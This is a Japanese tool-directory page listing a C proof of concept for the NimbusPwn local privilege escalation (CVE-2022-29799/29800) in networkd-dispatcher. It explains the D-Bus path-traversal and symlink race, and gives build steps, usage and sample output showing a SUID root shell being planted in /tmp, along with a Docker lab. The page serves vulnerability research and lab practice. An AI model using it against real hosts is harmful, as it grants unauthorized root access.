Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
NimbusPWN-CVE-2022-29799-29800 — NimbusPwn (CVE-2022-29799/29800) ローカル権限昇格 PoC in C. | Kitploit
ツール/GitHubGitHub/joshuavanderpoll/nimbuspwn-cve-2022-29799-29800
特権昇格脆弱性分析エクスプロイトペネトレーションテスト学習と教育ラボと実践
GitHubjoshuavanderpoll/nimbuspwn-cve-2022-29799-29800

NimbusPWN-CVE-2022-29799-29800

NimbusPwn (CVE-2022-29799/29800) ローカル権限昇格 PoC in C.

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
5113ヶ月前未レビュー

NimbusPwn — networkd-dispatcher < 2.1 ローカル権限昇格 (CVE-2022-29799 / CVE-2022-29800) PoC

C Linux

📜 説明

NimbusPwnのC言語PoC、networkd-dispatcherにおけるローカル権限昇格。非特権ユーザーがD-Bus名org.freedesktop.network1を要求し、細工されたOperationalStateを送信します。ルートデーモンはそれをサニタイズせず(CVE-2022-29799、パストラバーサル)、スクリプトディレクトリでのシンボリックリンク競合(CVE-2022-29800、TOCTOU)により、攻撃者が仕込んだスクリプトをルートとして実行させ、SUIDルートシェルをドロップします。

影響を受けるバージョン: networkd-dispatcher < 2.1(2.1で修正)。Linuxのみ。システムD-Busと要求可能なorg.freedesktop.network1名が必要です。

🛠️ インストール

Linux(Kaliまたはターゲットマシン)でビルドします。macOS/Windowsではビルドも実行もできません。

git clone https://github.com/joshuavanderpoll/NimbusPWN-CVE-2022-29799-29800.git
cd NimbusPWN-CVE-2022-29799-29800
sudo apt install -y gcc libc6-dev libdbus-1-dev pkg-config
cc nimbuspwn.c -o nimbuspwn $(pkg-config --cflags --libs dbus-1)

[!NOTE] 他のディストリビューション: dnf install gcc dbus-devel pkgconf(Fedora/RHEL)またはpacman -S gcc dbus pkgconf(Arch)。コンパイル行は同じです。

⚙️ 使い方

脆弱なホスト上で非特権ユーザーとして実行します。

./nimbuspwn [-c] [-s SHELL]
  -c, --check        non-breaking vuln check, no exploitation
  -s, --shell SHELL  shell to SUID-copy and spawn as root (default /bin/sh)
  -h, --help         show help

まず確認します(安全で、何も配置せず、競合もしません):

$ ./nimbuspwn --check
[+] owned org.freedesktop.network1
[+] verdict: likely vulnerable (org.freedesktop.network1 is claimable, no privesc tried)

次にエクスプロイト:

$ ./nimbuspwn
[*] shell=/bin/sh drop=/tmp/sh attempts=10
[+] owned org.freedesktop.network1
[@] attempt 1 (/tmp/nimbuspwn_93732)
[+] planted 126 payloads (root-owned /sbin execs) in /tmp/nimbuspwn_93732
[*] OperationalState: ../../../tmp/nimbuspwn_93732/poc
[*] signal sent (serial 3)
[@] symlink swapped, waiting for root exec
[+] root backdoor at /tmp/sh, spawning shell
# id
uid=1000(pwn) gid=1000(pwn) euid=0(root) groups=1000(pwn)

競合は非決定的であるため、再試行します(デフォルト10回)。/bin/shがないホストでは-s /bin/bashを使用してください。

🐋 Docker PoC

自己完結型の脆弱なラボ(Ubuntu 20.04 + 脆弱なnetworkd-dispatcher 2.0)。--privilegedやホストネットワークは不要です。

docker compose build
docker compose run --rm nimbuspwn-lab
# inside, as user 'pwn':
./nimbuspwn

2.0のディスパッチャーはdocker/にベンダリングされているため、ビルドは外部ダウンロードに依存しません。ディスパッチャーログ: /var/log/dispatcher.log。

🕵🏼 参考文献

  • マイクロソフト: https://www.microsoft.com/en-us/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/
  • アップストリーム: https://gitlab.com/craftyguy/networkd-dispatcher

📢 免責事項

このツールは教育および研究目的のみで提供されます。作成者は、ツールの誤用や損害について一切の責任を負いません。

ツールをダウンロード